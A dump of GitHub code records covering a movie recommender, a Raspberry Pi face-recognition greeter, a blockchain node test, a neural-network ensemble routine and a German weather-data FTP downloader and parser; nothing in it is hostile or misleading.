n_features)\n\n # 2.计算损失\n def cost(self,param, y, r, n_features):\n n_movies, n_users = y.shape # y的大小是电影乘以用户\n x, theta = self.separate(param, n_movies, n_users, n_features)\n\n inner = np.multiply(np.dot(x, theta.T) - y, r) # 为什么要乘以r\n inner_cost = (1 / 2) * np.sum(np.power(inner, 2))\n return inner_cost\n\n # 加上正则化\n def regular_cost(self,param, y, r, n_features, l=1):\n n_movies, n_users = y.shape\n x, theta = self.separate(param, n_movies, n_users, n_features)\n\n inner_cost = self.cost(param, y, r, n_features)\n\n regular = (l / 2) * np.sum(np.power(param, 2))\n return inner_cost + regular\n\n # 3.计算梯度\n def grad(self,param, y, r, n_features):\n n_movies, n_users = y.shape\n x, theta = self.separate(param, n_movies, n_users, n_features)\n\n inner = np.multiply(np.dot(x, theta.T) - y, r)\n x_grad = np.dot(inner, theta)\n\n theta_grad = np.dot(inner.T, x)\n\n return self.merge(x_grad, theta_grad)\n\n # 加上正则化\n def regular_grad(self,param, y, r, n_features, l=1):\n inner_grad = self.grad(param, y, r, n_features)\n regular = l * param # param是x和theta的连接\n return inner_grad + regular\n\n\n def recommend(self,userid,filename2):\n n_movies,n_users=self.y.shape\n n_features=self.n_features\n l=self.l\n r=self.r\n y=self.y\n N=self.n_rec_movie\n movie_list=self.movie_list\n rec_list=[]\n rec_id=[]\n\n x_origin = np.random.standard_normal((n_movies, n_features))\n theta_origin = np.random.standard_normal((n_users, n_features))\n # param=np.concatenate((x_origin.ravel(), theta_origin.ravel()))\n param=self.merge(x_origin,theta_origin)\n\n y_mean=y-y.mean()\n\n # 对梯度进行优化\n res = opt.minimize(fun=self.regular_cost, x0=param, args=(y_mean, r, n_features, l), jac=self.regular_grad, method='TNC')\n param_train = res.x\n\n # 用得到的电影特征和用户偏好进行预测\n x_train, theta_train = self.separate(param_train, n_movies, n_users, n_features)\n\n predict = np.dot(x_train, theta_train.T)\n\n real_predict=predict[:,userid]+y.mean()\n # 以降序形式排列\n idx = np.argsort(real_predict)[::-1]\n print('----------------------')\n print(real_predict[idx][:N]) # 输出前10个索引对应的行的评分\n print('----------------------')\n\n\n print('推荐的电影为:')\n movie_list=np.array(movie_list)\n for i in movie_list[idx][:N]:\n rec_list.append(i)\n print(i)\n\n for lines in self.loadfile(filename2):\n imdbid=lines.split(',')[0]\n title=lines.split(',')[1]#读入电影名称\n if title in rec_list:\n rec_id.append(imdbid)\n print(rec_id)\n\n return rec_id\n","repo_name":"iambajie/movie-recommend","sub_path":"users/recommend/recommend_lfm.py","file_name":"recommend_lfm.py","file_ext":"py","file_size_in_byte":6370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3429764223","text":"import os\nimport json\nimport shutil\nfrom utils.helpers import remove_dir\nimport streamlit as st\ndef delete_from_cache(id):\n path = f'dataset/cache/{id}'\n ids = load_metadata()\n if(id in ids):\n #Remove\n ids.remove(id)\n save_metadata(ids)\n try:\n shutil.rmtree(path)\n except Exception as e:\n pass \n\n\n return ids\ndef add_to_cache(id):\n cache_size =int(os.environ[\"CACHE_SIZE\"])\n ## Load Metadata\n ids = load_metadata()\n ## Append ID\n if(id in ids):\n delete_from_cache(id)\n if(len(ids) THREDHOLD\n\n def capture_still_image(self):\n return \"imgs/test1.jpg\"\n t = time.strftime(\"%Y%m%d_%H%M%S\")\n path = \"imgs/%s.jpg\" % t\n popen = subprocess.Popen(['raspistill','-vf', '-w','200','-h','200','-o',path])\n ret = popen.communicate()\n return path\n\n def is_screen_changed(self, new_path, old_path):\n return True\n\n def is_somebody_in_picture(self, path):\n return True\n\n def recognize_with_facepp(self, path):\n\n # rst = api.recognition.identify(group_name = 'test', url = TARGET_IMAGE)\n rst = api.recognition.identify(group_name = 'saladgroup', img = File(path))\n print('recognition result', rst)\n print('=' * 60)\n if len(rst['face']) > 0 and len(rst['face'][0]['candidate']) > 0:\n print('The person with highest confidence:', \\\n rst['face'][0]['candidate'][0]['person_name'])\n return rst\n\n def is_only_master_in_picture(self, regn):\n if len(regn['face']) > 1 :\n return False\n\n if len(regn['face']) > 0:\n if len(regn['face'][0]['candidate']) > 0:\n return self._is_someone(regn['face'][0]['candidate'], MASTER)\n\n return False\n\n def is_friend(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n return self._is_someone(candicates[0], FRIEND)\n\n return False\n\n def is_only_stranger_in_picture(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n is_stranger = True\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candicates[0], MASTER) or self._is_someone(candicates[0], FRIEND):\n print('is stranger')\n is_stranger = False\n break\n\n return is_stranger\n\n def is_master_with_others(self, regn):\n if len(regn['face']) <= 1 :\n return False\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candidates[0], MASTER):\n return True\n\n return False\n\n def welcome_master_with_others(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_friend(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_master(self):\n pygame.mixer.music.load(\"res/welecomehome_master.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def yield_at_stranger(self):\n pygame.mixer.music.load(\"res/yield_at_stranger.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n\n def run_forever(self):\n while True:\n path = self.capture_still_image()\n changed = self.is_screen_changed(path, self.last_path)\n if not changed:\n # Sleep\n continue\n sb = self.is_somebody_in_picture(path)\n if not sb:\n # Sleep\n continue\n\n ret = self.recognize_with_facepp(path)\n if self.is_master_with_others(ret):\n self.welcome_master_with_others()\n elif self.is_friend(ret):\n self.welcome_friend()\n elif self.is_only_master_in_picture(ret):\n self.welcome_master()\n elif self.is_only_stranger_in_picture(ret):\n self.yield_at_stranger()\n\n\nif __name__ == \"__main__\":\n alex = PoliteAlex()\n alex.run_forever()\n","repo_name":"alex-chan/raspalex","sub_path":"polite_alex.py","file_name":"polite_alex.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35819322465","text":"import os\nimport pytest\n\nfrom plenum.server.node import Node\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(tconf):\n old_val = tconf.VALIDATOR_INFO_USE_DB\n tconf.VALIDATOR_INFO_USE_DB = True\n yield tconf\n tconf.VALIDATOR_INFO_USE_DB = old_val\n\n\ndef test_dump_general_info_use_db(tconf, node):\n node._info_tool.dump_general_info()\n file_name = node._info_tool.GENERAL_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n db_name = node._info_tool.GENERAL_DB_NAME_TEMPLATE.format(node_name=node.name.lower())\n db_path = os.path.join(node.node_info_dir, db_name)\n assert os.path.exists(file_path)\n assert os.path.exists(db_path)\n\n\ndef test_dump_additional_info(node):\n Node.dump_additional_info(node)\n file_name = node._info_tool.ADDITIONAL_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n assert os.path.exists(file_path)\n\n\ndef test_file_version_info(node):\n file_name = node._info_tool.VERSION_FILE_NAME_TEMPLATE.format(node_name=node.name.lower())\n file_path = os.path.join(node.node_info_dir, file_name)\n assert os.path.exists(file_path)\n assert os.path.getsize(file_path) > 0\n","repo_name":"hyperledger/indy-plenum","sub_path":"plenum/test/validator_info/test_validator_info_dump.py","file_name":"test_validator_info_dump.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"3663398715","text":"#!/usr/bin/env python\n# coding=utf-8\nfrom .DFTBcal import *\nfrom ..Neuralnetwork import *\nfrom ..Base import *\nfrom ..Comparm import GPARAMS \nimport numpy as np\n\ndef Cal_NN_EFQ(NNSet,inpath='./'):\n ERROR_mols=[]\n ERROR_strlist=[]\n MSet_list=[MSet('ID%d'%i) for i in range(len(GPARAMS.Esoinn_setting.NNdict['NN']))]\n Mol_label=[[] for i in NNSet.mols]\n if GPARAMS.Esoinn_setting.NNdict[\"Charge\"]!=None:\n N_Times=math.ceil(len(NNSet.mols)/GPARAMS.Neuralnetwork_setting.Batchsize)\n QMCHARGE=[]\n for i in range(N_Times):\n TMMSET=MSet('tmp')\n TMMSET.mols=NNSet.mols[i*GPARAMS.Neuralnetwork_setting.Batchsize:(i+1)*GPARAMS.Neuralnetwork_setting.Batchsize]\n# try:\n atom_charge=\\\n Eval_charge(TMMSET,GPARAMS.Esoinn_setting.NNdict[\"Charge\"])\n# except:\n# atom_charge=[]\n QMCHARGE+=list(atom_charge)\n for i in range(len(NNSet.mols)):\n for j in NNSet.mols[i].belongto:\n MSet_list[j].mols.append(NNSet.mols[i])\n Mol_label[i].append([j,len(MSet_list[j].mols)-1])\n E=[];F=[];Dipole=[];Charge=[]\n for i in range(len(GPARAMS.Esoinn_setting.NNdict[\"NN\"])):\n if len(MSet_list[i].mols)>0:\n N_Times=math.ceil(len(MSet_list[i].mols)/GPARAMS.Neuralnetwork_setting.Batchsize)\n E_tmp=[];F_tmp=[];Dipole_tmp=[];Charge_tmp=[]\n for j in range(N_Times):\n TMMSET=MSet('tmp')\n TMMSET.mols=MSet_list[i].mols[j*GPARAMS.Neuralnetwork_setting.Batchsize:(j+1)*GPARAMS.Neuralnetwork_setting.Batchsize]\n #print (\"NN Calculation at here!\")\n #Etotal,Ebp,Ebp_atom,Ecc,Evdw,mol_dipole,atom_charge,gradient,hess=\\\n Etotal,Ebp,Ebp_atom,Ecc,Evdw,mol_dipole,atom_charge,gradient=\\\n EvalSet(TMMSET,GPARAMS.Esoinn_setting.NNdict[\"NN\"][i])\n #print (\"NN Calculation at over!\")\n E_tmp+=list(Etotal);F_tmp+=list(gradient);Dipole_tmp+=list(mol_dipole);Charge_tmp+=list(atom_charge)\n E.append(E_tmp)\n F.append(F_tmp)\n Dipole.append(Dipole_tmp)\n Charge.append(Charge_tmp)\n else:\n E.append([])\n F.append([])\n Dipole.append([])\n Charge.append([])\n MAX_ERR=[]\n NN_predict=[]\n for i,imol in enumerate(NNSet.mols):\n ERROR_str=''\n E_i=[];F_i=[];D_i=[];Q_i=[]\n for j in Mol_label[i]:\n E_i.append(E[j[0]][j[1]])\n F_i.append(F[j[0]][j[1]][0:len(imol.coords)])\n D_i.append(Dipole[j[0]][j[1]])\n Q_i.append(Charge[j[0]][j[1]][0:len(imol.coords)])\n E_i=np.array(E_i)*627.51\n F_i=np.array(F_i)*627.51/JOULEPERHARTREE\n D_i=np.array(D_i)\n Q_i=np.array(Q_i)\n NN_num=len(imol.belongto)\n if NN_num <=3:\n N_num=min(2,NN_num)\n else:\n N_num=math.ceil((NN_num+1)/2)\n E_avg=np.mean(E_i)\n F_avg=np.mean(F_i,axis=0)\n #tmp_list=np.argsort(np.max(np.reshape(np.square(F_i-F_avg),(len(imol.belongto),-1)),1))[:N_num]\n tmp_list=np.argsort(np.max(np.reshape(np.square(F_i-F_avg),(len(imol.belongto),-1)),1))\n F_New=[F_i[m] for m in tmp_list]\n F_avg=np.mean(F_New,axis=0)\n E_New=[E_i[m] for m in tmp_list]\n D_New=[D_i[m] for m in tmp_list]\n Q_New=[Q_i[m] for m in tmp_list]\n E_avg=np.mean(E_New)\n D_avg=np.mean(D_New,axis=0)\n Q_avg=np.mean(Q_New,axis=0)\n MSE_F=np.square(F_New-F_avg).mean(axis=0)\n MAX_MSE_F=-np.sort(-np.reshape(MSE_F,-1))[0]\n MAX_ERR.append(MAX_MSE_F)\n method='NN'\n if MAX_MSE_F > GPARAMS.Train_setting.sigma**2 and MAX_MSE_F<(GPARAMS.Train_setting.sigma*3)**2:\n ERROR_str+='%s in NNSet is not believable, MAX_MSE_F: %f\\n '%(imol.name,MAX_MSE_F)\n ERROR_strlist.append(ERROR_str)\n ERROR_mols.append([NNSet.mols[i],MAX_MSE_F])\n NN_predict.append([E_avg,F_avg,D_avg,Q_avg])\n\n if GPARAMS.Esoinn_setting.NNdict[\"Charge\"]!=None:\n for i in range(len(NNSet.mols)):\n NN_predict[i][3]=QMCHARGE[i]\n return NN_predict,ERROR_mols,MAX_ERR,ERROR_strlist,method\n\n","repo_name":"MingyuanXu/ESOINN-DP","sub_path":"build/lib/ESOI_HDNN_MD/Computemethod/NNcal.py","file_name":"NNcal.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"1099634936","text":"# Benötigte Module laden\n## Übliche Module\nimport datetime as dt\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport pandas_profiling as pp\nimport os, shutil\nimport zipfile as zip\nimport re\nimport random\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport matplotlib.pyplot as plt\n\n## Statsmodel\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport statsmodels.tsa.api as smt\n\n## Crawler im weiteren Sinne\nfrom bs4 import BeautifulSoup\nimport requests\nfrom ftplib import FTP\n\n# Angabe eines headers, da der Server sonst den request ablehnen könnte\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n\n# Definition der Tage für die Wettervorhersage\nd0 = dt.date.today()\nd1 = d0 + dt.timedelta(days=1)\nd2 = d0 + dt.timedelta(days=2)\nd3 = d0 + dt.timedelta(days=3)\n\n\n# Daten als CSV wegschreiben\ndef save_csv(quelle, name):\n dataframe = quelle\n dataframe.to_csv(name + \".csv\", index=0)\n dataframe = pd.read_csv(name + \".csv\")\n print('Der Datensatz wurde erfolgreich gespeichert')\n print(\"Er umfasst: \",dataframe.shape[0],\"Zeilen und \",dataframe.shape[1],\"Spalten\")\n return dataframe.head()\n\n\ndef Beschreibung_Stationen1():\n file = 'KL_Tageswerte_Beschreibung_Stationen.txt'\n \n if os.path.isdir('backlog') == False:\n os.mkdir('backlog')\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/daily/kl/recent/')\n \n list1 = ftp.nlst()\n \n if file in list1:\n ftp.retrbinary('RETR ' + file, open('backlog/' + file, 'wb').write)\n print('Beschreibung der Stationen vom FTP heruntergeladen und abgelegt')\n else:\n print('Beschreibung der Stationen vom FTP nicht verfügbar')\n \n ftp.quit()\n\n\ndef Beschreibung_Stationen2():\n file = 'KL_Standardformate_Beschreibung_Stationen.txt'\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/subdaily/standard_format/')\n \n list1 = ftp.nlst()\n \n if file in list1:\n ftp.retrbinary('RETR ' + file, open('backlog/' + file, 'wb').write)\n print('Beschreibung der Stationen vom FTP heruntergeladen und abgelegt')\n else:\n print('Beschreibung der Stationen vom FTP nicht verfügbar')\n \n ftp.quit()\n \n\ndef Stationen_importieren1(von_datum):\n list1 = []\n \n file = 'KL_Tageswerte_Beschreibung_Stationen.txt'\n \n with open('backlog/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n \n imp = str(imp).split('\\n')\n \n for x in imp:\n y = re.split('\\s+', x)\n list1 += [y]\n \n df = pd.DataFrame.from_dict(list1)\n # Erste Zeile enthält die Spaltenbezeichnungen\n headers = df.iloc[0]\n df = pd.DataFrame(df.values[1:], columns=headers)\n \n # Spalten-Bereinigung beim Import\n # Stationsnamen und Bundesländer wurden in mehrere Spalten getrennt\n #df = df.replace([None], [' '], regex=True)\n df = df.replace(np.NaN, ' ', regex=True)\n \n df = df.rename(columns={df.columns.get_values()[8]: 'a1'})\n cols=pd.Series(df.columns)\n for dup in df.columns.get_duplicates(): \n cols[df.columns.get_loc(dup)] = [dup+'.'+str(d_idx) if d_idx!=0 else dup for d_idx in range(df.columns.get_loc(dup).sum())]\n df.columns=cols\n df['ColumnA'] = df[df.columns[6:]].apply(lambda x: ' '.join(x.astype(str)), axis=1)\n df = df.drop(df.columns[6:12], axis=1)\n \n # Zeilen-Bereinigung beim Import\n df = df.drop([0]) # Erste Zeile (Trennzeichen) löschen\n df = df[:-1] # Letzte Zeile (Leerzeile) löschen\n \n # Datum umwandeln\n df['von_datum2'] = pd.to_datetime(df['von_datum'], format='%Y%m%d')\n df['bis_datum2'] = pd.to_datetime(df['bis_datum'], format='%Y%m%d')\n df = df.drop(df.columns[1:3], axis=1)\n df['von_datum'] = df['von_datum2']\n df['bis_datum'] = df['bis_datum2']\n df = df.drop(df.columns[5:7], axis=1)\n \n # Stationsname und Bundesland trennen (Reste aus der Spalten-Bereinigung)\n df[['Stationsname','Bundesland']] = df['ColumnA'].str.rsplit(expand=True, n=1)\n df = df.drop(['ColumnA'], axis=1)\n \n # Nur aktuelle Stationen beibehalten\n df = df.loc[df['bis_datum'] >= von_datum]\n \n print('Beschreibung der Stationen vom FTP importiert')\n\n return df\n\n\ndef Stationen_importieren2(von_datum):\n list1 = []\n \n file = 'KL_Standardformate_Beschreibung_Stationen.txt'\n \n with open('backlog/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n \n imp = str(imp).split('\\n')\n \n for x in imp:\n y = re.split('\\s+', x)\n list1 += [y]\n \n df = pd.DataFrame.from_dict(list1)\n # Erste Zeile enthält die Spaltenbezeichnungen\n headers = df.iloc[0]\n df = pd.DataFrame(df.values[1:], columns=headers)\n \n df = df.drop(df.index[81:], axis=0)\n df = df.drop(df.index[0], axis=0)\n \n #df = df.replace([None], [' '], regex=True)\n df = df.replace(np.NaN, ' ', regex=True)\n \n df = df.rename(columns={df.columns.get_values()[9]: 'a1'})\n df = df.rename(columns={df.columns.get_values()[10]: 'a1'})\n df = df.rename(columns={df.columns.get_values()[11]: 'a1'})\n cols=pd.Series(df.columns)\n for dup in df.columns.get_duplicates(): \n cols[df.columns.get_loc(dup)] = [dup+'.'+str(d_idx) if d_idx!=0 else dup for d_idx in range(df.columns.get_loc(dup).sum())]\n df.columns=cols\n df['ColumnA'] = df[df.columns[7:]].apply(lambda x: ' '.join(x.astype(str)), axis=1)\n df = df.drop(df.columns[7:12], axis=1)\n \n df['von_datum'] = pd.to_datetime(df['von'], format='%Y%m%d')\n df['bis_datum'] = pd.to_datetime(df['bis'], format='%Y%m%d')\n df = df.drop(df.columns[2:4], axis=1)\n \n # Stationsname und Bundesland trennen (Reste aus der Spalten-Bereinigung)\n df[['Stationsname','Bundesland']] = df['ColumnA'].str.rsplit(expand=True, n=1)\n df = df.drop(['ColumnA'], axis=1)\n \n print('Beschreibung der Stationen vom FTP importiert')\n\n return df\n\n\ndef Tageswerte_downloaden(stations_ids): \n list1, list2, list3, list4 = [], [], [], []\n \n d0 = dt.date.today()\n pfad = 'backlog/' + str(d0)\n os.makedirs(pfad, exist_ok=True)\n \n # Verbindung aufbauen\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/daily/kl/recent/')\n \n # Verzeichnis auslesen\n list1 = ftp.nlst()\n\n for x in stations_ids:\n file1 = 'tageswerte_KL_' + x + '_akt.zip'\n\n if file1 in list1:\n ftp.retrbinary('RETR ' + file1, open(pfad + '/' + file1, 'wb').write)\n else:\n list3 += [x]\n \n ftp.quit()\n \n # Verbindung trennen und neu aufbauen\n \n ftp = FTP('opendata.dwd.de')\n ftp.login()\n ftp.cwd('climate_environment/CDC/observations_germany/climate/subdaily/standard_format/')\n \n #Verzeichnis auslesen\n list2 = ftp.nlst()\n \n for x in list3:\n file2 = 'kl_' + x + '_00_akt.txt'\n \n if file2 in list2:\n ftp.retrbinary('RETR ' + file2, open(pfad + '/' + file2, 'wb').write)\n else:\n list4 += [x]\n \n ftp.quit()\n \n # Verbindung trennen\n for x in list4:\n print(x + ' wurde auf dem FTP nicht gefunden')\n \n print('Alle anderen Tageswerte heruntergeladen und abgelegt')\n\n\ndef Tageswerte_entpacken(datum): \n pfad = 'backlog/' + datum\n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n\n if os.path.isdir(pfad_entpackt) == False:\n os.mkdir(pfad_entpackt)\n\n for file in os.listdir(pfad):\n if file.endswith('.zip'):\n with zip.ZipFile(pfad + '/' + file, 'r') as zip_ref:\n list1 = zip_ref.namelist()\n for file in list1:\n if file.startswith('produkt_klima_tag_'):\n zip_ref.extract(member=file, path=pfad)\n else:\n pass\n zip_ref.close()\n else:\n pass\n\n if file.endswith('.txt'):\n shutil.move(pfad + '/' + file, pfad_entpackt + '/' + file)\n else:\n pass\n \n print('Alle Tageswerte zum Datum ' + datum + ' im gleichnamigen Verzeichnis entpackt oder verschoben')\n\n\ndef Tageswerte_importieren1(datum, ab_datum, ausgabe): \n filelist = []\n \n dataframe_temp = pd.DataFrame()\n dataframe = pd.DataFrame()\n \n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n \n for file in os.listdir(pfad_entpackt):\n if file.startswith('produkt_klima_tag_') and file.endswith('.txt'):\n filelist += [file]\n \n for file in filelist:\n with open(pfad_entpackt + '/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n imp = str(imp).split('\\n')\n \n dataframe_temp = pd.DataFrame.from_dict(imp)\n dataframe_temp = dataframe_temp.replace(' ', '', regex=True)\n dataframe_temp = dataframe_temp[0].str.split(';', expand=True)\n \n headers = dataframe_temp.iloc[0]\n dataframe_temp = pd.DataFrame(dataframe_temp.values[1:], columns=headers)\n \n dataframe_temp = dataframe_temp.dropna()\n dataframe_temp['MESS_DATUM2'] = pd.to_datetime(dataframe_temp['MESS_DATUM'], format='%Y%m%d')\n dataframe_temp = dataframe_temp.drop(['MESS_DATUM', 'QN_3', 'QN_4', 'eor'], axis=1)\n dataframe_temp = dataframe_temp.rename({'MESS_DATUM2': 'MESS_DATUM'}, axis=1)\n dataframe_temp = dataframe_temp.loc[dataframe_temp['MESS_DATUM'] >= ab_datum]\n dataframe_temp['MESS_DATUM'] = dataframe_temp['MESS_DATUM'].astype('datetime64[D]')\n dataframe_temp['STATIONS_ID'] = dataframe_temp['STATIONS_ID'].astype('category')\n dataframe_temp['RSKF'] = dataframe_temp['RSKF'].astype('category')\n dataframe_temp['NM'] = dataframe_temp['NM'].astype('category')\n \n if ausgabe == 1:\n print(file, len(dataframe_temp))\n \n dataframe = dataframe.append(dataframe_temp)\n dataframe_temp = pd.DataFrame()\n\n print('Tageswerte ab dem ' + ab_datum + ' in das DataFrame importiert')\n \n return dataframe\n\n\ndef Tageswerte_importieren2(datum, ab_datum, ausgabe):\n # Anhand des KX-Formats der Datensatzbeschreibung ergibt sich aus dem importierten String mit 288 Zeichen eine \n # Reihenfolge, nach der ab einer bestimmten Zeichenzahl ein Split durchgeführt werden muss\n split = [2, 7, 11, 13, 15, 19, 24, 25, 30, 31, 36, 37, 42, 43, 47, 48, 52, 53, 56, 57, 61, 62, 63, 67, 68, 72, \n 73, 77, 78, 82, 83, 87, 88, 89, 93, 94, 95, 99, 100, 101, 104, 105, 108, 109, 112, 113, 116, 117, 120, \n 121, 124, 125, 128, 129, 132, 133, 136, 137, 140, 141, 144, 145, 147, 149, 150, 152, 154, 155, 157, 159, \n 160, 163, 164, 166, 167, 169, 170, 172, 173, 175, 176, 178, 179, 181, 182, 184, 185, 187, 188, 190, 191, \n 194, 195, 198, 199, 200, 202, 203, 205, 206, 208, 209, 211, 212, 214, 215, 217, 218, 220, 221, 223, 224, \n 226, 227, 231, 232, 233, 237, 238, 239, 243, 244, 245, 249, 250, 251, 254, 255, 256, 259, 260, 261, 264, \n 265, 269, 270, 275, 276, 281, 282]\n list2, list3, list4 = [], [], []\n cols = ['KE','ST','JA','MO','TA','--','P1','Q','P2','Q','P3','Q','PM','Q','TXK','Q','TNK','Q','TRK','Q','TGK','S',\n 'Q','T1','Q','T2','Q','T3','Q','TMK','Q','TF1','ETF1','Q','TF2','ETF2','Q','TF3','ETF3','Q','VP1','Q','VP2',\n 'Q','VP3','Q','VPM','Q','UP1','Q','UP2','Q','UP3','Q','UPM','Q','UR1','Q','UR2','Q','UR3','Q','D1','FK1','Q',\n 'D2','FK2','Q','D3','FK3','Q','FMK','Q','N1','Q','C1','Q','W1','Q','N2','Q','C2','Q','W2','Q','N3','Q','C3',\n 'Q','W3','Q','NM','Q','SDK','SDJ','Q','V1','Q','V2','Q','V3','Q','E1','Q','E2','Q','E3','Q','VAK','Q','VBK',\n 'Q','VCK','Q','R1','RF1','Q','R2','RF2','Q','R3','RF3','Q','RSK','RSKF','Q','SHK','SA','Q','NSH','NSHJ','Q',\n 'FXK','Q','ASH','Q','WAAS','Q','WASH','Q']\n filelist = [] #['kl_10147_00_akt.txt']\n \n dataframe_temp = pd.DataFrame()\n dataframe = pd.DataFrame()\n \n pfad_entpackt = 'backlog/' + datum + '/entpackt'\n \n for file in os.listdir(pfad_entpackt):\n if file.startswith('kl_') and file.endswith('_00_akt.txt'):\n filelist += [file]\n \n for file in filelist:\n with open(pfad_entpackt + '/' + file, 'r', encoding='iso-8859-1') as f:\n imp = f.read()\n imp = imp.split('\\n')\n\n for y in imp:\n j = 0\n list2 = []\n for x in split:\n list2 = y[j:x]\n j = x\n \n list3 += [list2]\n \n list4 += [list3]\n list3 = []\n \n dataframe_temp = pd.DataFrame.from_dict(list4)\n list4 = []\n dataframe_temp = dataframe_temp.append(pd.Series(cols, index=dataframe_temp.columns ), ignore_index=True)\n headers = dataframe_temp.iloc[-1]\n dataframe_temp = pd.DataFrame(dataframe_temp.values[0:], columns=headers)\n dataframe_temp = dataframe_temp.drop(dataframe_temp.index[-1], axis=0)\n dataframe_temp = dataframe_temp.drop(['Q'], axis=1)\n stations_id = str(file).split('_')[2]\n dataframe_temp['ST'] = file.replace('kl_', '').replace('_00_akt.txt', '')\n dataframe_temp['MESS_DATUM'] = dataframe_temp['JA'] + '-' + dataframe_temp['MO'] + '-' + dataframe_temp['TA']\n dataframe_temp = dataframe_temp.loc[dataframe_temp['MESS_DATUM'] >= ab_datum]\n \n dataframe = dataframe.append(dataframe_temp)\n dataframe.drop_duplicates(inplace=True)\n if ausgabe == 1:\n print(file, len(dataframe_temp))\n dataframe_temp = pd.DataFrame()\n \n print('Tageswerte ab dem ' + ab_datum + ' in das DataFrame importiert')\n \n return dataframe\n\n\ndef Tageswerte2_transformieren(dataframe):\n # subdaily-DataFrame anpassen\n # auf die Spalten in subdaily_columns einschränken\n subdaily_columns = ['ST', 'FXK', 'FMK', 'RSK', 'RSKF', 'SDK', 'SHK', 'NM', \n 'VPM', 'PM', 'TMK', 'UPM', 'TXK', 'TNK', 'TGK', 'MESS_DATUM']\n daily_columns = ['STATIONS_ID', 'FX', 'FM', 'RSK', 'RSKF', 'SDK', 'SHK_TAG', 'NM', \n 'VPM', 'PM', 'TMK', 'UPM', 'TXK', 'TNK', 'TGK', 'MESS_DATUM']\n \n dataframe = dataframe[subdaily_columns]\n # Spaltenüberschriften aus den daily_columns übernehmen\n dataframe.columns = daily_columns\n \n to_change = [col for col in dataframe.columns if col not in ['MESS_DATUM', 'STATIONS_ID']]\n \n for col in to_change:\n dataframe[col] = dataframe[col].astype('float64')\n dataframe['MESS_DATUM'] = dataframe['MESS_DATUM'].astype('datetime64[D]')\n dataframe['STATIONS_ID'] = dataframe['STATIONS_ID'].astype('category')\n dataframe['RSKF'] = dataframe['RSKF'].astype('category')\n\n dataframe = dataframe.reset_index().drop('index', axis=1)\n \n dataframe.loc[dataframe['FX'] != -99, 'FX'] = dataframe['FX'] * 0.1\n dataframe.loc[dataframe['FM'] != -99, 'FM'] = (0.836 * dataframe['FM'] * dataframe['FM']**0.5) * 0.1\n dataframe.loc[dataframe['RSK'] != -999, 'RSK'] = dataframe['RSK'] * 0.1\n dataframe.loc[dataframe['SDK'] != -99, 'SDK'] = dataframe['SDK'] *0.1\n dataframe.loc[dataframe['NM'] != -99, 'NM'] = dataframe['NM'] * 0.1\n dataframe.loc[dataframe['VPM'] != -99, 'VPM'] = dataframe['VPM'] * 0.1\n dataframe.loc[dataframe['PM'] != -9999, 'PM'] = dataframe['PM'] * 0.1\n dataframe.loc[dataframe['TMK'] != -999, 'TMK'] = dataframe['TMK'] * 0.1\n dataframe.loc[dataframe['TXK'] != -999, 'TXK'] = dataframe['TXK'] * 0.1\n dataframe.loc[dataframe['TNK'] != -999, 'TNK'] = dataframe['TNK'] * 0.1\n dataframe.loc[dataframe['TGK'] != -999, 'TGK'] = dataframe['TGK'] * 0.1\n \n return dataframe\n\n\ndef Tageswerte_zusammenlegen(subdaily, daily):\n # daily-DataFrame anpassen\n to_change = [col for col in daily.columns if col not in ['MESS_DATUM', 'STATIONS_ID']]\n \n for col in to_change:\n daily[col] = daily[col].astype('float64')\n daily['MESS_DATUM'] = daily['MESS_DATUM'].astype('datetime64[D]')\n daily['STATIONS_ID'] = daily['STATIONS_ID'].astype('category')\n daily['RSKF'] = daily['RSKF'].astype('category')\n daily['NM'] = daily['NM'].astype('category')\n \n # DataFrames zusammenführen\n dataframe = subdaily.append(daily)\n dataframe['STATIONS_ID'] = dataframe['STATIONS_ID'].astype('category')\n dataframe = dataframe.reset_index().drop('index', axis=1)\n dataframe.drop_duplicates(inplace=True)\n \n return dataframe\n\n\ndef Stationsdaten_loeschen(dataframe, days):\n filelist = []\n pfad = 